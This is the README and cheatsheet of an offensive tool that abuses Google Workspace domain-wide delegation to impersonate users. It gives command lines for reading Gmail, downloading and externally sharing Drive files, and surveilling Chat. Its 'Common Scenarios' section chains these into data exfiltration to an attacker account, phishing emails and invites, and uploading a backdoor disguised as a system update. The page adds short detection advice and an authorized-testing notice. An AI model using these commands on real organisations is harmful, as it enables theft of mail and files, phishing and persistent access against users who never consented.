Skip to content

lutzenfried/Delegate

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

23 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ” GCP Delegate Tool - Complete Cheatsheet

Domain-Wide Delegation Abuse Tool for Security Testing
Version 3.0.0 | By @lutzenfried


πŸ“‹ Table of Contents


πŸš€ Quick Start

Basic Syntax

python delegate.py -k <SERVICE_ACCOUNT_KEY> -i <EMAIL_TO_IMPERSONATE> -m <MODULE> -a <ACTION> [OPTIONS]

Required Parameters

Parameter Short Description
--key -k Service account key JSON file path
--impersonate -i Email address to impersonate
--module -m Module: gmail, drive, calendar, chat
--action -a Action to perform (see module sections)

πŸ“§ Gmail Module

Available Actions

Action Description Required Parameters
list List emails (subject + sender) None
read Read full email contents None
listFolders List all Gmail labels/folders None
listFromLabel List emails from specific label --label
readFromLabel Read emails from specific label --label
send Send an email --recipient, --subject, --content
downloadAttachments Download all attachments None

Commands

List Emails

python delegate.py -k sa_key.json -i [email protected] -m gmail -a list

Read Email Contents

python delegate.py -k sa_key.json -i [email protected] -m gmail -a read

List Gmail Folders/Labels

python delegate.py -k sa_key.json -i [email protected] -m gmail -a listFolders

List Emails from Specific Label

# INBOX
python delegate.py -k sa_key.json -i [email protected] -m gmail -a listFromLabel --label "INBOX"

# SENT
python delegate.py -k sa_key.json -i [email protected] -m gmail -a listFromLabel --label "SENT"

# IMPORTANT
python delegate.py -k sa_key.json -i [email protected] -m gmail -a listFromLabel --label "IMPORTANT"

Read Emails from Label

python delegate.py -k sa_key.json -i [email protected] -m gmail -a readFromLabel --label "INBOX"

Send Email

python delegate.py -k sa_key.json -i [email protected] -m gmail -a send \
  --recipient "[email protected]" \
  --subject "Important Update" \
  --content "This is the email body text"

Download All Attachments

python delegate.py -k sa_key.json -i [email protected] -m gmail -a downloadAttachments

Gmail Label Examples

Common Gmail labels:

  • INBOX - Inbox emails
  • SENT - Sent emails
  • DRAFT - Draft emails
  • TRASH - Trash
  • SPAM - Spam folder
  • IMPORTANT - Important emails
  • STARRED - Starred emails
  • UNREAD - Unread emails

πŸ’Ύ Drive Module

Available Actions

Action Description Required Parameters
listFiles List all files and folders None
listFolders List folders with contents None
download Download a specific file --filename
upload Upload a file to Drive --filepath, --filename, [--foldername]
modifyPermissions Share file with external account --filename, --external-account

Commands

List All Files

python delegate.py -k sa_key.json -i [email protected] -m drive -a listFiles

List Folders with Contents

python delegate.py -k sa_key.json -i [email protected] -m drive -a listFolders

Download File

python delegate.py -k sa_key.json -i [email protected] -m drive -a download \
  --filename "Confidential_Report.xlsx"

Supported File Types:

  • Google Sheets β†’ Exports as .xlsx
  • Google Docs β†’ Exports as .docx
  • Google Slides β†’ Exports as .pptx
  • Binary files β†’ Downloads as-is

Upload File

# Upload to root
python delegate.py -k sa_key.json -i [email protected] -m drive -a upload \
  --filepath "/path/to/local/file.pdf" \
  --filename "uploaded_file.pdf"

# Upload to specific folder
python delegate.py -k sa_key.json -i [email protected] -m drive -a upload \
  --filepath "/path/to/local/file.pdf" \
  --filename "uploaded_file.pdf" \
  --foldername "Documents"

Share File with External Account

python delegate.py -k sa_key.json -i [email protected] -m drive -a modifyPermissions \
  --filename "Sensitive_Data.xlsx" \
  --external-account "[email protected]"

Note: This grants write access and sends a notification email.


πŸ“… Calendar Module

Available Actions

Action Description Required Parameters
listCalendars List all accessible calendars None
listEvents List upcoming events [--calendar-id], [--max-results]
getEventDetails Get detailed event information --event-id, [--calendar-id]
getAttendees List event attendees --event-id, [--calendar-id]
createEvent Create a new calendar event --summary, --start-time, --end-time, [--description], [--location], [--attendees]
listMeetingRecordings Find meeting recordings in Drive [--calendar-id], [--max-results]

Commands

List All Calendars

python delegate.py -k sa_key.json -i [email protected] -m calendar -a listCalendars

List Upcoming Events

# From primary calendar (default)
python delegate.py -k sa_key.json -i [email protected] -m calendar -a listEvents

# From specific calendar with max results
python delegate.py -k sa_key.json -i [email protected] -m calendar -a listEvents \
  --calendar-id "[email protected]" \
  --max-results 50

Get Event Details

python delegate.py -k sa_key.json -i [email protected] -m calendar -a getEventDetails \
  --calendar-id primary \
  --event-id "abc123xyz789"

Get Event Attendees

python delegate.py -k sa_key.json -i [email protected] -m calendar -a getAttendees \
  --calendar-id primary \
  --event-id "abc123xyz789"

Create Calendar Event

# Basic event
python delegate.py -k sa_key.json -i [email protected] -m calendar -a createEvent \
  --calendar-id primary \
  --summary "Security Review Meeting" \
  --start-time "2025-11-15T14:00:00-05:00" \
  --end-time "2025-11-15T15:00:00-05:00"

# Event with full details
python delegate.py -k sa_key.json -i [email protected] -m calendar -a createEvent \
  --calendar-id primary \
  --summary "Q4 Planning Session" \
  --description "Quarterly planning and review" \
  --start-time "2025-11-15T14:00:00-05:00" \
  --end-time "2025-11-15T16:00:00-05:00" \
  --location "Conference Room A" \
  --attendees "[email protected],[email protected],[email protected]"

Time Format: ISO 8601 with timezone

  • 2025-11-15T14:00:00-05:00 (EST)
  • 2025-11-15T19:00:00+00:00 (UTC)
  • 2025-11-15T20:00:00+01:00 (CET)

Find Meeting Recordings

python delegate.py -k sa_key.json -i [email protected] -m calendar -a listMeetingRecordings \
  --calendar-id primary \
  --max-results 30

Note: Searches Drive for video files matching event titles from the last 30 days.


πŸ’¬ Chat Module

Available Actions

Action Description Required Parameters
listSpaces List all accessible Chat spaces None
listMessages List messages in a space --space-id, [--max-results]
readMessages Read full message content --space-id, [--max-results]
sendMessage Send a message to space --space-id, --text, [--thread-id]
sendWithAttachment Send message with file --space-id, --text, --filepath, [--thread-id]
downloadAttachments Download all attachments --space-id, [--max-results]
getMembers List space members --space-id
createSpace Create a new Chat space --summary, [--description], [--threaded]

Commands

List All Chat Spaces

python delegate.py -k sa_key.json -i [email protected] -m chat -a listSpaces

List Messages in Space

python delegate.py -k sa_key.json -i [email protected] -m chat -a listMessages \
  --space-id "AAAAAbCdEfG" \
  --max-results 100

Read Full Message Content

python delegate.py -k sa_key.json -i [email protected] -m chat -a readMessages \
  --space-id "AAAAAbCdEfG" \
  --max-results 50

Send Message

# Simple message
python delegate.py -k sa_key.json -i [email protected] -m chat -a sendMessage \
  --space-id "AAAAAbCdEfG" \
  --text "Hello team!"

# Reply to thread
python delegate.py -k sa_key.json -i [email protected] -m chat -a sendMessage \
  --space-id "AAAAAbCdEfG" \
  --text "Replying to this thread" \
  --thread-id "xyz123abc"

Send Message with Attachment

python delegate.py -k sa_key.json -i [email protected] -m chat -a sendWithAttachment \
  --space-id "AAAAAbCdEfG" \
  --text "Please review this document" \
  --filepath "/path/to/document.pdf"

# With thread
python delegate.py -k sa_key.json -i [email protected] -m chat -a sendWithAttachment \
  --space-id "AAAAAbCdEfG" \
  --text "Updated version attached" \
  --filepath "/path/to/file.xlsx" \
  --thread-id "xyz123abc"

Download Attachments

python delegate.py -k sa_key.json -i [email protected] -m chat -a downloadAttachments \
  --space-id "AAAAAbCdEfG" \
  --max-results 100

Note: Creates a chat_attachments_<SPACE_ID> directory with all downloaded files.

Get Space Members

python delegate.py -k sa_key.json -i [email protected] -m chat -a getMembers \
  --space-id "AAAAAbCdEfG"

Create New Space

# Basic space
python delegate.py -k sa_key.json -i [email protected] -m chat -a createSpace \
  --summary "Project Alpha"

# Space with description and threading
python delegate.py -k sa_key.json -i [email protected] -m chat -a createSpace \
  --summary "Security Team" \
  --description "Internal security discussions" \
  --threaded

🎯 Common Scenarios

Scenario 1: Complete Email Reconnaissance

# Step 1: List all folders
python delegate.py -k sa_key.json -i [email protected] -m gmail -a listFolders

# Step 2: List emails from INBOX
python delegate.py -k sa_key.json -i [email protected] -m gmail -a listFromLabel --label "INBOX"

# Step 3: Read email contents
python delegate.py -k sa_key.json -i [email protected] -m gmail -a read

# Step 4: Download all attachments
python delegate.py -k sa_key.json -i [email protected] -m gmail -a downloadAttachments

Scenario 2: Drive Data Exfiltration

# Step 1: List all files
python delegate.py -k sa_key.json -i [email protected] -m drive -a listFolders

# Step 2: Download sensitive files
python delegate.py -k sa_key.json -i [email protected] -m drive -a download \
  --filename "Q4_Financial_Report.xlsx"

python delegate.py -k sa_key.json -i [email protected] -m drive -a download \
  --filename "Customer_Database.csv"

# Step 3: Share with external account
python delegate.py -k sa_key.json -i [email protected] -m drive -a modifyPermissions \
  --filename "Q4_Financial_Report.xlsx" \
  --external-account "[email protected]"

Scenario 3: Calendar Intelligence Gathering

# Step 1: List all calendars
python delegate.py -k sa_key.json -i [email protected] -m calendar -a listCalendars

# Step 2: List upcoming events
python delegate.py -k sa_key.json -i [email protected] -m calendar -a listEvents

# Step 3: Get details of specific event
python delegate.py -k sa_key.json -i [email protected] -m calendar -a getEventDetails \
  --calendar-id primary \
  --event-id "EVENT_ID_HERE"

# Step 4: Find meeting recordings
python delegate.py -k sa_key.json -i [email protected] -m calendar -a listMeetingRecordings

Scenario 4: Chat Space Surveillance

# Step 1: List all spaces
python delegate.py -k sa_key.json -i [email protected] -m chat -a listSpaces

# Step 2: Get space members
python delegate.py -k sa_key.json -i [email protected] -m chat -a getMembers \
  --space-id "SPACE_ID_HERE"

# Step 3: Read messages
python delegate.py -k sa_key.json -i [email protected] -m chat -a readMessages \
  --space-id "SPACE_ID_HERE" \
  --max-results 200

# Step 4: Download attachments
python delegate.py -k sa_key.json -i [email protected] -m chat -a downloadAttachments \
  --space-id "SPACE_ID_HERE"

Scenario 5: Phishing Campaign

# Step 1: Create calendar event (meeting invite)
python delegate.py -k sa_key.json -i [email protected] -m calendar -a createEvent \
  --calendar-id primary \
  --summary "URGENT: Security Training Required" \
  --description "Click here to complete mandatory training: https://phishing-site.com" \
  --start-time "2025-11-16T09:00:00-05:00" \
  --end-time "2025-11-16T10:00:00-05:00" \
  --attendees "[email protected],[email protected],[email protected]"

# Step 2: Send phishing email
python delegate.py -k sa_key.json -i [email protected] -m gmail -a send \
  --recipient "[email protected]" \
  --subject "Password Reset Required" \
  --content "Your password will expire in 24 hours. Reset now: https://phishing-site.com"

# Step 3: Send to Chat space
python delegate.py -k sa_key.json -i [email protected] -m chat -a sendMessage \
  --space-id "SPACE_ID_HERE" \
  --text "Important: Please complete this security form: https://phishing-site.com"

Scenario 6: Data Upload and Persistence

# Step 1: Upload backdoor to Drive
python delegate.py -k sa_key.json -i [email protected] -m drive -a upload \
  --filepath "/path/to/backdoor.exe" \
  --filename "System_Update.exe" \
  --foldername "Scripts"

# Step 2: Create persistent calendar reminder
python delegate.py -k sa_key.json -i [email protected] -m calendar -a createEvent \
  --calendar-id primary \
  --summary "System Maintenance" \
  --description "Automated maintenance task" \
  --start-time "2025-12-01T02:00:00-05:00" \
  --end-time "2025-12-01T03:00:00-05:00"

πŸ”§ PowerShell Shortcuts

Set Variables for Easier Use

# Set common variables
$KEY = ".\service_account.json"
$USER = "[email protected]"

# Use variables
python .\delegate.py -k $KEY -i $USER -m gmail -a list
python .\delegate.py -k $KEY -i $USER -m drive -a listFiles
python .\delegate.py -k $KEY -i $USER -m calendar -a listEvents
python .\delegate.py -k $KEY -i $USER -m chat -a listSpaces

Batch Operations

# Test multiple users
$users = @("[email protected]", "[email protected]", "[email protected]")

foreach ($user in $users) {
    Write-Host "[*] Testing: $user" -ForegroundColor Cyan
    python .\delegate.py -k $KEY -i $user -m gmail -a listFolders
}

πŸ›‘οΈ Security Notes

Domain-Wide Delegation Setup

For this tool to work, the service account must have domain-wide delegation configured in Google Workspace Admin Console:

  1. Go to Security β†’ API Controls β†’ Domain-wide Delegation
  2. Add the service account's Client ID
  3. Authorize these OAuth scopes:
    https://mail.google.com/
    https://www.googleapis.com/auth/drive
    https://www.googleapis.com/auth/calendar
    https://www.googleapis.com/auth/chat.spaces
    

Detection & Prevention

Detection:

  • Monitor Google Workspace audit logs for service account activity
  • Alert on API calls from unusual IPs
  • Track file sharing to external domains
  • Monitor bulk downloads

Prevention:

  • Limit domain-wide delegation scopes
  • Regularly audit service account permissions
  • Implement IP restrictions
  • Enable advanced protection for high-risk users
  • Use context-aware access policies

⚠️ Legal Notice

FOR AUTHORIZED SECURITY TESTING ONLY

This tool is designed for:

  • βœ… Authorized penetration testing
  • βœ… Security research in lab environments
  • βœ… Red team exercises with permission
  • βœ… Security awareness training

Never use without explicit written authorization!

Unauthorized access to computer systems is illegal under:

  • Computer Fraud and Abuse Act (CFAA) - USA
  • Computer Misuse Act - UK
  • Similar laws worldwide

πŸ“š Additional Resources


πŸŽ“ Quick Reference Card

Module Most Common Actions
Gmail list, read, downloadAttachments
Drive listFolders, download, modifyPermissions
Calendar listEvents, getEventDetails, createEvent
Chat listSpaces, readMessages, downloadAttachments

Version 3.0.0 | Last Updated: 2025-10-16 | Author: @lutzenfried

About

Tool to perform GCP Domain Wide Delegation abuse and access Gmail and Drive data

Resources

Stars

72 stars

Watchers

1 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages